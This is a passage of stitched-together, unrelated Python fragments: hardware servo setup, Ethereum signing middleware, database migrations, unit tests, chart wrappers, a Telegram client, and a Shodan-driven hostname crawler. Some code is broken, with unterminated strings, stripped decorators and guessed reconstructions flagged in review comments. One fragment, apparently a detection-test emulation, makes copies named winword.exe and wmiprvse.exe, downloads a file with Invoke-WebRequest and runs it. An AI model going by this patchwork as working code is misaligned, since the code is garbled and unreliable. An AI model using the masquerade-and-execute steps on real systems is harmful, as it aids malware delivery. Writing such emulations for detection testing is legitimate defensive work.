        mode = int(_mode)
    except Exception:
        # Empty / non-numeric input keeps the default mode 1.
        pass
    print(mode)
    print('')
    if mode not in (1, 2):
        # BUG FIX: the original reached an undefined `goto(change())` deep
        # inside the servo loops when the mode was invalid (a NameError);
        # validate up front and re-prompt instead.
        print('Please set the parameter mode !!!')
        return change()
    for _mycbot in mc:
        print(_mycbot)
        for i in range(1, 7):
            if mode == 1:
                data = [10, 0, 1, 0, 3, 3]
            elif i < 4:
                # mode 2, joints 1-3
                data = [5, 15, 0, 0, 3, 3]
            else:
                # mode 2, joints 4-6
                data = [8, 24, 0, 0, 3, 3]
            for j in range(len(data_id)):
                _mycbot.set_servo_data(i, data_id[j], data[j])
                time.sleep(0.2)
                # Read the value back to confirm the write stuck.
                _data = _mycbot.get_servo_data(i, data_id[j])
                time.sleep(0.2)
                if _data == data[j]:
                    print('Servo motor :' + str(i) + ' data_id : ' + str(data_id[j]) + ' data: ' + str(_data) + ' modify successfully ')
                else:
                    print('Servo motor :' + str(i) + ' data_id : ' + str(data_id[j]) + ' data: ' + str(_data) + ' modify error ')
def construct_sign_and_send_raw_middleware(private_key_or_account: Union[_PrivateKey, Collection[_PrivateKey]]) -> Middleware:
    """Build a middleware that intercepts ``eth_sendTransaction`` for locally
    held keys and replaces it with a signed ``eth_sendRawTransaction``."""
    accounts = gen_normalized_accounts(private_key_or_account)

    def sign_and_send_raw_middleware(make_request: Callable[[RPCEndpoint, Any], Any], w3: 'Web3') -> Callable[[RPCEndpoint, Any], RPCResponse]:
        format_and_fill_tx = compose(format_transaction, fill_transaction_defaults(w3), fill_nonce(w3))

        def middleware(method: RPCEndpoint, params: Any) -> RPCResponse:
            # Anything we cannot (or should not) sign locally passes through.
            if method != 'eth_sendTransaction':
                return make_request(method, params)
            transaction = format_and_fill_tx(params[0])
            if 'from' not in transaction:
                return make_request(method, params)
            if transaction.get('from') not in accounts:
                return make_request(method, params)
            # The sender's key is managed here: sign and send the raw tx.
            account = accounts[transaction['from']]
            raw_tx = account.sign_transaction(transaction).rawTransaction
            return make_request(RPCEndpoint('eth_sendRawTransaction'), [raw_tx.hex()])
        return middleware
    return sign_and_send_raw_middleware
def reject_recursive_repeats(to_wrap: Callable[..., Any]) -> Callable[..., Any]:
    """Decorator: raise ValueError when *to_wrap* is re-entered with the same
    argument objects on the same thread (i.e. a recursive repeat call)."""
    import functools
    import threading
    to_wrap.__already_called = {}

    # BUG FIX: this decorator had been reduced to a bare `(to_wrap)`
    # expression statement; restore `@functools.wraps` so the wrapper keeps
    # the wrapped function's name/docstring.
    @functools.wraps(to_wrap)
    def wrapped(*args: Any) -> Any:
        # Key on argument object identities plus the thread id, so threads
        # do not interfere with each other's in-flight call tracking.
        arg_instances = tuple(map(id, args))
        thread_id = threading.get_ident()
        thread_local_args = (thread_id,) + arg_instances
        if thread_local_args in to_wrap.__already_called:
            raise ValueError(f'Recursively called {to_wrap} with {args!r}')
        to_wrap.__already_called[thread_local_args] = True
        try:
            wrapped_val = to_wrap(*args)
        finally:
            # Always clear the marker, even if the call raised.
            del to_wrap.__already_called[thread_local_args]
        return wrapped_val
    return wrapped
def downgrade():
    """Revert events/events_version from an event_topic_id foreign key back
    to the legacy free-text topic column, then drop the event_topics table."""
    # Drop the FK first so the column type can be changed.
    op.drop_constraint('events_event_topic_id_fkey', 'events', type_='foreignkey')
    # Convert the id column to varchar, then backfill it with the topic name
    # looked up from event_topics (cast needed: values are still numeric ids).
    op.execute('ALTER TABLE events ALTER COLUMN event_topic_id TYPE varchar USING event_topic_id::varchar')
    op.execute('UPDATE events SET event_topic_id = (SELECT name FROM event_topics WHERE event_topics.id=cast(events.event_topic_id as int))')
    # Same conversion and backfill for the versioning shadow table.
    op.execute('ALTER TABLE events_version ALTER COLUMN event_topic_id TYPE varchar USING event_topic_id::varchar')
    op.execute('UPDATE events_version SET event_topic_id = (SELECT name FROM event_topics WHERE event_topics.id=cast(events_version.event_topic_id as int))')
    # Restore the legacy column names (note the plural 'topics' on the
    # version table — matches the pre-migration schema).
    op.alter_column('events', 'event_topic_id', new_column_name='topic')
    op.alter_column('events_version', 'event_topic_id', new_column_name='topics')
    # Finally drop the now-unreferenced lookup table.
    op.drop_table('event_topics')
class GetForObjectModelDbTest(TestModelMixin, TestBase):
    """Version.objects.get_for_object must honour the model_db argument."""
    databases = {'default', 'postgres'}

    def testGetForObjectModelDb(self):
        # Create the object on the non-default connection inside a revision.
        with reversion.create_revision():
            instance = TestModel.objects.db_manager('postgres').create()
        # No version on the default db; exactly one on the 'postgres' db.
        default_count = Version.objects.get_for_object(instance).count()
        postgres_count = Version.objects.get_for_object(instance, model_db='postgres').count()
        self.assertEqual(default_count, 0)
        self.assertEqual(postgres_count, 1)
class ResizeError(FlowChecksumBase):
    """Every bsn_table_set_buckets_size request here must be answered with an
    OFPT_ERROR message (the sizes are rejected by the switch)."""

    def runTest(self):
        # Refactor: the original repeated the identical four-line
        # send/barrier/poll/assert stanza five times; loop over the sizes
        # instead (behavior unchanged).
        for buckets_size in (0, 3, 100, (2 ** 32) - 1, 2 ** 31):
            self.controller.message_send(ofp.message.bsn_table_set_buckets_size(table_id=TABLE_ID, buckets_size=buckets_size))
            do_barrier(self.controller)
            error, _ = self.controller.poll(ofp.OFPT_ERROR)
            self.assertIsInstance(error, ofp.message.error_msg)
# BUG FIX: the parametrize line had lost its `@pytest.mark.` prefix (it began
# with a bare `.parametrize(`, a SyntaxError); the decorator is restored with
# its original arguments.
@pytest.mark.parametrize('test_ds,expected_interpolable_spaces', [('test_v5_aktiv.designspace', [({}, {'AktivGroteskVF_Italics_Wght', 'AktivGroteskVF_Italics_WghtWdth', 'AktivGroteskVF_Wght', 'AktivGroteskVF_WghtWdth', 'AktivGroteskVF_WghtWdthItal'})]), ('test_v5_sourceserif.designspace', [({'italic': 0}, {'SourceSerif4Variable-Roman'}), ({'italic': 1}, {'SourceSerif4Variable-Italic'})]), ('test_v5_MutatorSans_and_Serif.designspace', [({'serif': 0}, {'MutatorSansVariable_Weight_Width', 'MutatorSansVariable_Weight', 'MutatorSansVariable_Width'}), ({'serif': 1}, {'MutatorSerifVariable_Width'})])])
def test_split(datadir, tmpdir, test_ds, expected_interpolable_spaces):
    """Splitting a designspace yields the expected interpolable sub-spaces and
    variable fonts, and the written files match the reference output."""
    data_in = datadir / test_ds
    temp_in = Path(tmpdir) / test_ds
    shutil.copy(data_in, temp_in)
    doc = DesignSpaceDocument.fromfile(temp_in)
    for i, (location, sub_doc) in enumerate(splitInterpolable(doc)):
        expected_location, expected_vf_names = expected_interpolable_spaces[i]
        assert location == expected_location
        vfs = list(splitVariableFonts(sub_doc))
        assert expected_vf_names == set(vf[0] for vf in vfs)
        # Compare each written sub-document against the checked-in reference
        # (or regenerate the references when the update flag is set).
        loc_str = '_'.join(f'{name}_{value}' for (name, value) in sorted(location.items()))
        data_out = (datadir / 'split_output') / f'{temp_in.stem}_{loc_str}.designspace'
        temp_out = (Path(tmpdir) / 'out') / f'{temp_in.stem}_{loc_str}.designspace'
        temp_out.parent.mkdir(exist_ok=True)
        sub_doc.write(temp_out)
        if UPDATE_REFERENCE_OUT_FILES_INSTEAD_OF_TESTING:
            data_out.write_text(temp_out.read_text(encoding='utf-8'), encoding='utf-8')
        else:
            assert data_out.read_text(encoding='utf-8') == temp_out.read_text(encoding='utf-8')
        for vf_name, vf_doc in vfs:
            data_out = ((datadir / 'split_output') / vf_name).with_suffix('.designspace')
            temp_out = ((Path(tmpdir) / 'out') / vf_name).with_suffix('.designspace')
            temp_out.parent.mkdir(exist_ok=True)
            vf_doc.write(temp_out)
            if UPDATE_REFERENCE_OUT_FILES_INSTEAD_OF_TESTING:
                data_out.write_text(temp_out.read_text(encoding='utf-8'), encoding='utf-8')
            else:
                assert data_out.read_text(encoding='utf-8') == temp_out.read_text(encoding='utf-8')
def run_in_environment_with_teleport(environment: EnvironmentDefinition, code: str, teleport_info: TeleportInfo, locations: DataLocation, config: RuntimeConfig, adapter_type: str) -> AdapterResponse:
    """Run dbt model *code* inside the given isolated environment (virtualenv
    or conda), wiring in teleport data locations and, for remote runs, a
    zipped copy of the local fal scripts directory.

    Raises:
        Exception: if *environment.kind* is neither 'virtualenv' nor 'conda'.
    """
    compressed_local_packages = None
    is_remote = (type(environment.host) is FalServerlessHost)
    deps = get_default_pip_dependencies(is_remote=is_remote, adapter_type=adapter_type, is_teleport=True)
    fal_scripts_path = get_fal_scripts_path(config)
    # Remote (serverless) runs cannot see the local filesystem, so the fal
    # scripts directory is shipped along as an in-memory zip blob.
    if (is_remote and fal_scripts_path.exists()):
        with NamedTemporaryFile() as temp_file:
            with zipfile.ZipFile(temp_file.name, 'w', zipfile.ZIP_DEFLATED) as zip_file:
                for entry in fal_scripts_path.rglob('*'):
                    zip_file.write(entry, entry.relative_to(fal_scripts_path))
            # Read back the finished archive (zip file is closed by now).
            compressed_local_packages = temp_file.read()
    execute_model = partial(run_with_teleport, code=code, teleport_info=teleport_info, locations=locations, config=config, local_packages=compressed_local_packages)
    if (environment.kind == 'virtualenv'):
        # User requirements plus the default fal/dbt dependencies.
        requirements = environment.config.get('requirements', [])
        requirements += deps
        isolated_function = isolated(kind='virtualenv', host=environment.host, requirements=requirements)(execute_model)
    elif (environment.kind == 'conda'):
        # Conda packages from config, with the pip deps nested per conda's
        # environment.yml convention.
        dependencies = environment.config.pop('packages', [])
        dependencies.append({'pip': deps})
        env_dict = {'name': 'dbt_fal_env', 'channels': ['conda-forge', 'defaults'], 'dependencies': dependencies}
        isolated_function = isolated(kind='conda', host=environment.host, env_dict=env_dict)(execute_model)
    else:
        raise Exception(f'Environment type not supported: {environment.kind}')
    if is_remote:
        # Serverless runs also need an explicit machine size.
        isolated_function = isolated_function.on(machine_type=environment.machine_type)
    result = isolated_function()
    return result
_os(*metadata.platforms)
def main():
    """RTA scenario: masquerading winword/wmiprvse binaries download and run a
    dropped payload from a local web server, then the files are cleaned up."""
    server, ip, port = common.serve_web()
    # BUG FIX: the original line was a truncated `url = f'` (unterminated
    # f-string — the literal was lost during extraction). Reconstructed as
    # the served web root. NOTE(review): confirm the exact path component
    # against version control.
    url = f'http://{ip}:{port}'
    winword = 'C:\\Users\\Public\\winword.exe'
    wmiprvse = 'C:\\Users\\Public\\wmiprvse.exe'
    dropped = 'C:\\Users\\Public\\posh.exe'
    common.copy_file(EXE_FILE, winword)
    common.copy_file(EXE_FILE, wmiprvse)
    common.copy_file(EXE_FILE, dropped)
    # Fake-winword downloads the payload, fake-wmiprvse executes it.
    cmd = f'Invoke-WebRequest -Uri {url} -OutFile {dropped}'
    common.execute([winword, '/c', cmd], timeout=10)
    common.execute([wmiprvse, '/c', dropped], timeout=10, kill=True)
    common.remove_file(winword)
    common.remove_file(dropped)
.parametrize('settype', ['PARAMETER', 'COMPUTATION'])
def test_values_infer_simple(tmpdir, merge_files_oneLR, settype):
    """DLIS object attribute values are read correctly when the value type
    must be inferred; parametrized over the set type (see the stripped
    parametrize decorator above: 'PARAMETER' / 'COMPUTATION')."""
    path = os.path.join(str(tmpdir), 'values-infer-simple.dlis')
    # One logical record: set header for `settype` plus attribute parts
    # (a typed value, an empty INT attribute and an empty OBNAME attribute).
    content = [
        *assemble_set(settype),
        'data/chap4-7/eflr/ndattrs/objattr/2.dlis.part',
        'data/chap4-7/eflr/ndattrs/objattr/empty-INT.dlis.part',
        'data/chap4-7/eflr/ndattrs/objattr/empty-OBNAME.dlis.part',
    ]
    merge_files_oneLR(path, content)
    with dlis.load(path) as (f, *_):
        obj = f.object(settype, 'OBJECT', 10, 0)
        # The concrete value (2) must survive the type inference.
        assert (obj.values[0] == 2)
def test_update_tenant():
    """Integration test: tenant_mgt.update_tenant changes the display name
    and the two sign-in flags of an existing tenant.

    Creates a tenant, updates it, asserts the returned tenant reflects the
    update, and deletes the tenant in a finally block.
    """
    tenant = tenant_mgt.create_tenant(
        display_name='py-update-test',
        allow_password_sign_up=True,
        enable_email_link_sign_in=True)
    # Capture the created tenant's id: the original assertion compared
    # tenant.tenant_id with itself (a tautology), so an update returning a
    # different tenant would have gone unnoticed.
    created_tenant_id = tenant.tenant_id
    try:
        tenant = tenant_mgt.update_tenant(
            created_tenant_id,
            display_name='updated-py-tenant',
            allow_password_sign_up=False,
            enable_email_link_sign_in=False)
        assert isinstance(tenant, tenant_mgt.Tenant)
        # The update must apply to (and return) the tenant we created.
        assert (tenant.tenant_id == created_tenant_id)
        assert (tenant.display_name == 'updated-py-tenant')
        assert (tenant.allow_password_sign_up is False)
        assert (tenant.enable_email_link_sign_in is False)
    finally:
        tenant_mgt.delete_tenant(created_tenant_id)
def repeat_with_success_at_least(times, min_success):
    """Decorator factory: run a unittest test method up to *times* times and
    pass if at least *min_success* runs succeed (for flaky/stochastic tests).

    The decorated function must be a test method: args[0] must be a
    unittest.TestCase instance.
    """
    assert (times >= min_success)

    def _repeat_with_success_at_least(f):
        # NOTE(review): the bare "(f)" below looks like the remnant of a
        # stripped decorator line (e.g. "@functools.wraps(f)") — confirm
        # against the original source.
        (f)

        def wrapper(*args, **kwargs):
            assert (len(args) > 0)
            instance = args[0]
            assert isinstance(instance, unittest.TestCase)
            success_counter = 0
            failure_counter = 0
            results = []  # failed TestResult objects, kept for the report

            def fail():
                # Fail the outer test with aggregate counts and the first
                # recorded error message, if any.
                msg = '\nFail: {0}, Success: {1}'.format(failure_counter, success_counter)
                if (len(results) > 0):
                    first = results[0]
                    errs = (first.failures + first.errors)
                    if (len(errs) > 0):
                        # NOTE(review): the genexpr variable "fail" shadows
                        # this function's own name; harmless but confusing.
                        err_msg = '\n'.join((fail[1] for fail in errs))
                        msg += ('\n\nThe first error message:\n' + err_msg)
                instance.fail(msg)

            for _ in six.moves.range(times):
                # Each repeat runs on a *fresh* instance of the test class so
                # per-test state does not leak between attempts.
                suite = unittest.TestSuite()
                ins = type(instance)(instance._testMethodName)
                suite.addTest(unittest.FunctionTestCase(
                    (lambda : f(ins, *args[1:], **kwargs)),
                    setUp=ins.setUp,
                    tearDown=ins.tearDown))
                result = QuietTestRunner().run(suite)
                if result.wasSuccessful():
                    success_counter += 1
                else:
                    results.append(result)
                    failure_counter += 1
                if (success_counter >= min_success):
                    # Enough successes: record a trivial pass and stop early.
                    instance.assertTrue(True)
                    return
                if (failure_counter > (times - min_success)):
                    # Too many failures to ever reach min_success.
                    fail()
                    return
            fail()
        return wrapper
    return _repeat_with_success_at_least
class Database():
    """Abstract interface for a lookup/storage backend.

    Concrete backends override the query methods below; every base
    implementation raises NotImplementedError, except already_loaded(),
    which conservatively reports False.
    """

    def lookup_parts(self):
        """Return the parts known to this database."""
        raise NotImplementedError('')

    def lookup_dicts(self, *args, **kwargs):
        """Return result dictionaries for the given query arguments."""
        raise NotImplementedError('')

    def count(self, request):
        """Return the number of entries matching *request*."""
        raise NotImplementedError('')

    def load_iterator(self, iterator):
        """Load entries produced by *iterator* into the database."""
        raise NotImplementedError('')

    def sel(self, selection):
        """Apply *selection* and return the matching subset."""
        raise NotImplementedError('')

    def order_by(self, order):
        """Return results ordered by *order*."""
        raise NotImplementedError('')

    def already_loaded(self, path_or_url, owner):
        """Whether *path_or_url* was already loaded for *owner*.

        The base class has no persistence, so it always answers False.
        """
        return False
class OptionSeriesHeatmapDataAccessibility(Options):
    """Accessibility options for a heatmap data point (Highcharts wrapper).

    NOTE(review): each option appears twice as a getter/setter pair with the
    same name; the @property / @<name>.setter decorators were evidently
    stripped from this copy of the source.  As written, the second def
    silently shadows the first — restore the decorators before use.
    """

    def description(self):
        # Getter: configured description text (None when unset).
        return self._config_get(None)

    def description(self, text: str):
        # Setter: plain-text description exposed to screen readers.
        self._config(text, js_type=False)

    def enabled(self):
        # Getter: whether accessibility is enabled for this point.
        return self._config_get(None)

    def enabled(self, flag: bool):
        # Setter: toggle accessibility functionality for this point.
        self._config(flag, js_type=False)
class TestNXActionPopQueue(unittest.TestCase):
    """Unit tests for the NXActionPopQueue OpenFlow vendor action.

    The class-level byte strings assemble a serialized action as it appears
    on the wire: type | len | vendor | subtype | zero padding.
    """

    # Each wire field pairs the raw buffer with its expected decoded value.
    type_ = {'buf': b'\xff\xff', 'val': ofproto.OFPAT_VENDOR}
    len_ = {'buf': b'\x00\x10', 'val': ofproto.NX_ACTION_SET_TUNNEL_SIZE}
    # b'\x00\x00# ' is 0x00002320 ('#' == 0x23, ' ' == 0x20), i.e. the
    # Nicira experimenter id.
    vendor = {'buf': b'\x00\x00# ', 'val': ofproto_common.NX_EXPERIMENTER_ID}
    subtype = {'buf': b'\x00\x05', 'val': ofproto.NXAST_POP_QUEUE}
    zfill = (b'\x00' * 6)
    buf = ((((type_['buf'] + len_['buf']) + vendor['buf']) + subtype['buf']) + zfill)
    c = NXActionPopQueue()

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_init(self):
        # The constructor must set the NXAST_POP_QUEUE subtype.
        eq_(self.subtype['val'], self.c.subtype)

    def test_parser(self):
        # Parsing the assembled buffer yields matching header fields.
        res = OFPActionVendor.parser(self.buf, 0)
        eq_(self.type_['val'], res.type)
        eq_(self.len_['val'], res.len)
        eq_(self.subtype['val'], res.subtype)

    def test_serialize(self):
        # Serializing and unpacking round-trips all four header fields.
        buf = bytearray()
        self.c.serialize(buf, 0)
        fmt = ofproto.NX_ACTION_POP_QUEUE_PACK_STR
        res = struct.unpack(fmt, six.binary_type(buf))
        eq_(self.type_['val'], res[0])
        eq_(self.len_['val'], res[1])
        eq_(self.vendor['val'], res[2])
        eq_(self.subtype['val'], res[3])
('cuda.perm102_bmm_rcr.gen_profiler')
def gen_profiler(func_attrs, workdir, profiler_filename, dim_info_dict):
    """Generate profiler sources for the perm102 RCR batched-matmul op.

    Renders the argument parser and the problem-argument templates (both
    the classic and the CUTLASS 3.x variants) and delegates the actual
    profiler generation to bmm_common.gen_profiler.
    """
    # Dimension order for the perm102 layout: A[M,B,K] x B[B,N,K] -> C[M,B,N].
    parsed_args = bmm_common.ARGS_PARSER_TEMPLATE.render(
        a_dims=['M', 'B', 'K'],
        b_dims=['B', 'N', 'K'],
        c_dims=['M', 'B', 'N'],
    )
    mm_info = _get_default_problem_info(alpha_value=func_attrs.get('alpha', 1))
    classic_problem_args = bmm_common.PROBLEM_ARGS_TEMPLATE.render(mm_info=mm_info)
    # CUTLASS 3.x needs the element types folded into the problem info.
    mm_info_3x = bmm_common.add_elem_types_to_mm_info(mm_info=mm_info, func_attrs=func_attrs)
    cutlass_3x_problem_args = bmm_common.PROBLEM_ARGS_TEMPLATE_CUTLASS_3X.render(mm_info=mm_info_3x)
    return bmm_common.gen_profiler(
        func_attrs=func_attrs,
        workdir=workdir,
        profiler_filename=profiler_filename,
        dim_info_dict=dim_info_dict,
        src_template=common.SRC_TEMPLATE,
        problem_args=classic_problem_args,
        problem_args_cutlass_3x=cutlass_3x_problem_args,
        args_parser=parsed_args,
    )
class ConversionActionQuery(AbstractObject):
    """Facebook Ads SDK object for conversion action queries.

    Generated-SDK style: Field enumerates the API field names, and
    _field_types maps each field to its wire type.
    """

    def __init__(self, api=None):
        super(ConversionActionQuery, self).__init__()
        self._isConversionActionQuery = True
        self._api = api

    class Field(AbstractObject.Field):
        # API field names; fields whose API names contain dots get a
        # "field_"-prefixed Python identifier.
        field_action_type = 'action.type'
        application = 'application'
        conversion_id = 'conversion_id'
        creative = 'creative'
        dataset = 'dataset'
        event = 'event'
        field_event_creator = 'event.creator'
        event_type = 'event_type'
        fb_pixel = 'fb_pixel'
        fb_pixel_event = 'fb_pixel_event'
        leadgen = 'leadgen'
        object = 'object'
        field_object_domain = 'object.domain'
        offer = 'offer'
        field_offer_creator = 'offer.creator'
        offsite_pixel = 'offsite_pixel'
        page = 'page'
        field_page_parent = 'page.parent'
        post = 'post'
        field_post_object = 'post.object'
        field_post_object_wall = 'post.object.wall'
        field_post_wall = 'post.wall'
        question = 'question'
        field_question_creator = 'question.creator'
        response = 'response'
        subtype = 'subtype'

    # Wire type of each API field (everything is a list type here).
    _field_types = {'action.type': 'list<Object>', 'application': 'list<Object>', 'conversion_id': 'list<string>', 'creative': 'list<Object>', 'dataset': 'list<string>', 'event': 'list<string>', 'event.creator': 'list<string>', 'event_type': 'list<string>', 'fb_pixel': 'list<string>', 'fb_pixel_event': 'list<string>', 'leadgen': 'list<string>', 'object': 'list<string>', 'object.domain': 'list<string>', 'offer': 'list<string>', 'offer.creator': 'list<string>', 'offsite_pixel': 'list<string>', 'page': 'list<string>', 'page.parent': 'list<string>', 'post': 'list<string>', 'post.object': 'list<string>', 'post.object.wall': 'list<string>', 'post.wall': 'list<string>', 'question': 'list<string>', 'question.creator': 'list<string>', 'response': 'list<string>', 'subtype': 'list<string>'}

    # NOTE(review): in the generated SDK this is conventionally a
    # @classmethod; the decorator appears stripped in this copy.
    def _get_field_enum_info(cls):
        field_enum_info = {}
        return field_enum_info
class ResultsCacheBase(object):
    """Singleton base class for result caches.

    Subclasses override get()/set(); the base implementations are no-ops.
    The first construction creates the instance; later constructions return
    the same object.
    """

    _instance = None  # shared singleton instance

    def __new__(cls, *args, **kwargs):
        if (not cls._instance):
            # object.__new__ accepts no extra arguments; the original
            # forwarded *args/**kwargs, which raises TypeError for any
            # subclass whose constructor takes arguments.  Extra arguments
            # are consumed by __init__ instead.
            cls._instance = super(ResultsCacheBase, cls).__new__(cls)
        return cls._instance

    def get(self, key):
        """Return the cached value for *key* (no-op in the base class)."""
        pass

    def set(self, key, value):
        """Store *value* under *key* (no-op in the base class)."""
        pass
class OptionSeriesSolidgaugeOnpointPosition(Options):
    """Position options for a solid-gauge onPoint connector (Highcharts
    wrapper).

    NOTE(review): each option appears twice as a getter/setter pair with
    the same name; the @property / @<name>.setter decorators were evidently
    stripped from this copy — restore them, otherwise the later definition
    shadows the earlier one.
    """

    def offsetX(self):
        # Getter: horizontal offset (None when unset).
        return self._config_get(None)

    def offsetX(self, num: float):
        # Setter: horizontal offset in pixels.
        self._config(num, js_type=False)

    def offsetY(self):
        # Getter: vertical offset (None when unset).
        return self._config_get(None)

    def offsetY(self, num: float):
        # Setter: vertical offset in pixels.
        self._config(num, js_type=False)

    def x(self):
        # Getter: absolute x position (None when unset).
        return self._config_get(None)

    def x(self, num: float):
        # Setter: absolute x position.
        self._config(num, js_type=False)

    def y(self):
        # Getter: absolute y position (None when unset).
        return self._config_get(None)

    def y(self, num: float):
        # Setter: absolute y position.
        self._config(num, js_type=False)
def test_attendee_registered(db, client, jwt, user):
    """After checking an attendee in at a registration-type station, the
    states endpoint must report the attendee as registered."""
    user.is_super_admin = True
    # Minimal event graph: event -> microlocation, ticket, a registration
    # station, a session, and one attendee holding the ticket.
    event = EventFactoryBasic()
    microlocation = MicrolocationSubFactory(event=event)
    ticket = TicketSubFactory(event=event)
    station = StationSubFactory(event=event, microlocation=microlocation, station_type='registration')
    session = SessionSubFactory(event=event, microlocation=microlocation)
    attendee = AttendeeSubFactory(event=event, ticket=ticket)
    db.session.commit()
    # JSON:API payload registering the attendee at the station/session.
    data = json.dumps({'data': {'type': 'user_check_in', 'attributes': {}, 'relationships': {'station': {'data': {'id': str(station.id), 'type': 'station'}}, 'session': {'data': {'id': str(session.id), 'type': 'session'}}, 'ticket_holder': {'data': {'id': str(attendee.id), 'type': 'attendee'}}}}})
    client.post('/v1/user-check-in', content_type='application/vnd.api+json', headers=jwt, data=data)
    # Query the registration state for this attendee.
    data = {'event_id': event.id, 'attendee_id': attendee.id}
    response = client.get('/v1/states', content_type='application/json', headers=jwt, query_string=data)
    assert (response.status_code == 200)
    assert (json.loads(response.data)['is_registered'] is True)
def process_stream_frame(source_face: Face, temp_frame: Frame) -> Frame:
    """Run every configured frame processor over one stream frame.

    Each processor may veto stream processing via pre_process('stream');
    those that accept transform the frame in sequence (no target face is
    supplied for stream mode).
    """
    processor_modules = get_frame_processors_modules(facefusion.globals.frame_processors)
    for processor_module in processor_modules:
        if not processor_module.pre_process('stream'):
            # This processor opted out of stream processing.
            continue
        temp_frame = processor_module.process_frame(source_face, None, temp_frame)
    return temp_frame
def fqdns_from_weblinks(hostname, domains, timeout=5):
    """Resolve *hostname*, look up its open ports via Shodan, crawl the web
    links served on each HTTP(S) port, and return the set of FQDNs whose
    registered domain is in *domains*.

    NOTE(review): *timeout* is accepted but never used in this body —
    confirm whether it was meant to be passed to web_links().
    NOTE(review): this copy of the source is corrupted — the port filter
    condition and both scheme literals below are unterminated strings
    (presumably an HTTP-banner check and 'https'/'http'); restore them
    from the original before running.
    """
    fqdns = set()
    addrs = dnsx.resolve(hostname)
    if (not addrs):
        return fqdns
    # Only the first resolved address is queried against Shodan.
    addr = addrs[0]
    shodan_result = shodan_get_result(addr)
    if (not shodan_result):
        return fqdns
    for port in shodan_result['data']:
        if (' not in port):
            continue
        if ('ssl' in port):
            scheme = '
        else:
            scheme = '
        url = '{}://{}:{}'.format(scheme, hostname, port['port'])
        logging.info('connecting to {}'.format(url))
        links = web_links(url)
        for link in links:
            # Reduce each link to its registered domain; collect subdomained
            # hosts that fall under one of the target domains.
            tld = tldextract.extract(link)
            domain = '{}.{}'.format(tld.domain, tld.suffix)
            if (domain in domains):
                if tld.subdomain:
                    fqdns.add('{}.{}.{}'.format(tld.subdomain, tld.domain, tld.suffix))
    return fqdns
class Client(pyrogram.Client):
    """Pyrogram client subclass with a custom dispatcher, cached dialog
    iteration, interactive console authorization, and min-update repair.

    NOTE(review): many user-facing prompt strings in this copy of the file
    appear to have had their non-ASCII (likely Chinese) content stripped —
    the f-strings below contain only punctuation; confirm against the
    original source.
    """

    def __init__(self, *args, **kw):
        super().__init__(*args, **kw)
        # Replace pyrogram's defaults with project-local cache/dispatcher.
        self.cache = Cache()
        self.dispatcher = Dispatcher(self)

    async def authorize(self):
        """Interactively sign in: bot token if present, otherwise phone
        code (with retry) and, when required, the 2FA password."""
        if self.bot_token:
            return (await self.sign_in_bot(self.bot_token))
        retry = False
        while True:
            try:
                sent_code = (await self.send_code(self.phone_number))
                # Human-readable label for where the code was delivered.
                code_target = {SentCodeType.APP: ' Telegram ', SentCodeType.SMS: '', SentCodeType.CALL: '', SentCodeType.FLASH_CALL: '', SentCodeType.FRAGMENT_SMS: ' Fragment ', SentCodeType.EMAIL_CODE: ''}
                if (not self.phone_code):
                    if retry:
                        msg = f', "{self.phone_number}" ()'
                    else:
                        msg = f'{code_target[sent_code.type]} "{self.phone_number}" ()'
                    # Prompt on the shared rich console, indented to align
                    # with the logger output.
                    self.phone_code = Prompt.ask(((' ' * 23) + msg), console=var.console)
                signed_in = (await self.sign_in(self.phone_number, sent_code.phone_code_hash, self.phone_code))
            except (CodeInvalid, PhoneCodeInvalid):
                # Wrong code: clear it and loop to prompt again.
                self.phone_code = None
                retry = True
            except SessionPasswordNeeded:
                # Account has 2FA: loop asking for the password.
                retry = False
                while True:
                    if (not self.password):
                        if retry:
                            msg = f', "{self.phone_number}" (, )'
                        else:
                            msg = f' "{self.phone_number}" (, )'
                        self.password = Prompt.ask(((' ' * 23) + msg), password=True, console=var.console)
                    try:
                        return (await self.check_password(self.password))
                    except BadRequest:
                        self.password = None
                        retry = True
            else:
                break
        if isinstance(signed_in, types.User):
            return signed_in
        else:
            # Sign-up flow is not supported here.
            raise BadRequest('')

    def add_handler(self, handler: Handler, group: int=0):
        """Register *handler*; DisconnectHandler is stored directly, other
        handlers go through the custom dispatcher.  Returns a future-like
        result for API symmetry."""
        if isinstance(handler, DisconnectHandler):
            self.disconnect_handler = handler.callback

            async def dummy():
                pass
            # Return a completed no-op future so callers can always await.
            return asyncio.ensure_future(dummy())
        else:
            return self.dispatcher.add_handler(handler, group)

    def remove_handler(self, handler: Handler, group: int=0):
        """Unregister *handler* (mirror image of add_handler)."""
        if isinstance(handler, DisconnectHandler):
            self.disconnect_handler = None

            async def dummy():
                pass
            return asyncio.ensure_future(dummy())
        else:
            return self.dispatcher.remove_handler(handler, group)

    async def get_dialogs(self, limit: int=0, exclude_pinned=None, folder_id=None) -> Optional[AsyncGenerator[('types.Dialog', None)]]:
        """Yield dialogs, transparently caching pages (TTL 120 s) keyed by
        phone number / folder / pinned-exclusion so repeated listings skip
        already-fetched pages."""
        cache_id = f'dialogs_{self.phone_number}_{folder_id}_{(1 if exclude_pinned else 0)}'
        # Cached state: the pagination offsets plus previously yielded dialogs.
        ((offset_id, offset_date, offset_peer), cache) = (await self.cache.get(cache_id, ((0, 0, raw.types.InputPeerEmpty()), [])))
        current = 0
        total = (limit or ((1 << 31) - 1))  # 0 means "no limit"
        limit = min(100, total)  # Telegram page size cap
        for c in cache:
            (yield c)
            current += 1
            if (current >= total):
                return
        while True:
            r = (await self.invoke(raw.functions.messages.GetDialogs(offset_date=offset_date, offset_id=offset_id, offset_peer=offset_peer, limit=limit, hash=0, exclude_pinned=exclude_pinned, folder_id=folder_id), sleep_threshold=60))
            users = {i.id: i for i in r.users}
            chats = {i.id: i for i in r.chats}
            # Top message per chat, needed to build Dialog objects.
            messages = {}
            for message in r.messages:
                if isinstance(message, raw.types.MessageEmpty):
                    continue
                chat_id = utils.get_peer_id(message.peer_id)
                messages[chat_id] = (await types.Message._parse(self, message, users, chats))
            dialogs = []
            for dialog in r.dialogs:
                if (not isinstance(dialog, raw.types.Dialog)):
                    continue
                dialogs.append(types.Dialog._parse(self, dialog, messages, users, chats))
            if (not dialogs):
                return
            # Advance pagination offsets from the last dialog of this page.
            last = dialogs[(- 1)]
            offset_id = last.top_message.id
            offset_date = utils.datetime_to_timestamp(last.top_message.date)
            offset_peer = (await self.resolve_peer(last.chat.id))
            # Re-read the cache before appending in case it changed meanwhile.
            (_, cache) = (await self.cache.get(cache_id, ((0, 0, raw.types.InputPeerEmpty()), [])))
